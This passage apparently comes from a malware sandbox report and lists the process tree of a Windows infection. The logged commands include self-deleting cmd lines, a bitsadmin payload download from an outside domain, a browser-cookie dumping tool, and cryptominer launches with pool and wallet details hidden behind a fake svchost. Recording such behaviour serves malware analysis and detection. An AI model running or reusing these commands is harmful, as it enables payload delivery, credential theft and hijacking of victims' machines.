                                                                                                                                                                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\codiigfb.eri\y1.exe"
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                      PID:4192
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                        timeout /T 10 /NOBREAK
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                        PID:2340
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xyfc3tib.5dp\askinstall39.exe & exit
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:5436
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\xyfc3tib.5dp\askinstall39.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\xyfc3tib.5dp\askinstall39.exe
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:5764
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                          PID:4224
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                            PID:736
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\53lndwwu.tnd\setup.exe & exit
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:5640
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\53lndwwu.tnd\setup.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\53lndwwu.tnd\setup.exe
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          PID:5932
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\53lndwwu.tnd\setup.exe"
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                              PID:5252
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                PID:6064
                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\loe4xfis.5tw\SunLabsPlayer.exe /S & exit
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:6040
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\loe4xfis.5tw\SunLabsPlayer.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\loe4xfis.5tw\SunLabsPlayer.exe /S
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                              PID:5140
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4411.tmp\tempfile.ps1"
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                  PID:6032
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4411.tmp\tempfile.ps1"
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                    PID:5844
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4411.tmp\tempfile.ps1"
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                      PID:1416
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4411.tmp\tempfile.ps1"
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                        PID:5780
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4411.tmp\tempfile.ps1"
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                          PID:1016
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4411.tmp\tempfile.ps1"
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                            PID:4400
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4411.tmp\tempfile.ps1"
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                                            • Checks for any installed AV software in registry
                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                            PID:4468
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                            "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                            • Download via BitsAdmin
                                                                                                                                                                                                                                            PID:4372
                                                                                                                                                                                                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pm6vEf0V1jawU56m -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                                            PID:4436
                                                                                                                                                                                                                                          • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                                            "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pziF0KFaFHeETEUi -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                            PID:5360
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4411.tmp\tempfile.ps1"
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                              PID:5100
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4411.tmp\tempfile.ps1"
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                PID:5716
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4411.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                  PID:3292
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4411.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                    PID:1592
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4411.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                      PID:5976
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\lZqTxGDSUx\lZqTxGDSUx.dll" lZqTxGDSUx
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                      PID:2988
                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                        C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\lZqTxGDSUx\lZqTxGDSUx.dll" lZqTxGDSUx
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                          PID:5036
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4411.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                        PID:5256
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4411.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                          PID:4480
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4411.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                            PID:4812
                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4411.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                              PID:5932
                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsf4411.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                PID:4876
                                                                                                                                                                                                                                                              • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                                                                                                "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                PID:4952
                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ml2wbzzo.fii\005.exe & exit
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:4212
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\ml2wbzzo.fii\005.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\ml2wbzzo.fii\005.exe
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                PID:5276
                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\idrk0iie.us1\ifhwwyy.exe & exit
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:5768
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\idrk0iie.us1\ifhwwyy.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\idrk0iie.us1\ifhwwyy.exe
                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  PID:5664
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    PID:5220
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    PID:3184
                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eg2pzrwt.ihw\toolspab1.exe & exit
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:5348
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\eg2pzrwt.ihw\toolspab1.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\eg2pzrwt.ihw\toolspab1.exe
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                    PID:5328
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\eg2pzrwt.ihw\toolspab1.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\eg2pzrwt.ihw\toolspab1.exe
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                      PID:736
                                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                          PID:996
                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                            PID:4328
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                          PID:4680
                                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                          PID:5084
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                          PID:496
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                          PID:4832
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                          PID:4912
                                                                                                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                          PID:5620
                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 542C9535510590A0229FA9ED592EF764 C
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            PID:5940
                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding C5CC13998590CD34DFC0B0034827D76A
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            PID:5884
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                              "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                              PID:4268
                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 2532DAD8D4C3556732D87B8C2B2CEAE1 E Global\MSI0000
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                            PID:6072
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                          PID:5280
                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:4616
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\20D2.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\20D2.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                            PID:4616
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\20D2.exe
                                                                                                                                                                                                                                                              "{path}"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                              PID:4376
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe"
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:4872
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\svchost.exe
                                                                                                                                                                                                                                                                    "{path}"
                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                                                                                                                                    PID:4660
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\kernel.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\kernel.exe" -o pool.minexmr.com:4444 -u 49sjJJDaUPKiSdVsdUR1R51v1ovWXrAZw3QYEDay7qVt3gqxju2anikWRWkZ8ymFfzUyCvw27WP8WV7QvdYVSSrJH26nsXa -p x --max-cpu-usage 40
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      PID:4544
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                      PID:5660
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                      PID:904
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                      PID:344
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                      PID:4732
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                      PID:5424
                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                          PID:4484
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                        PID:6112
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
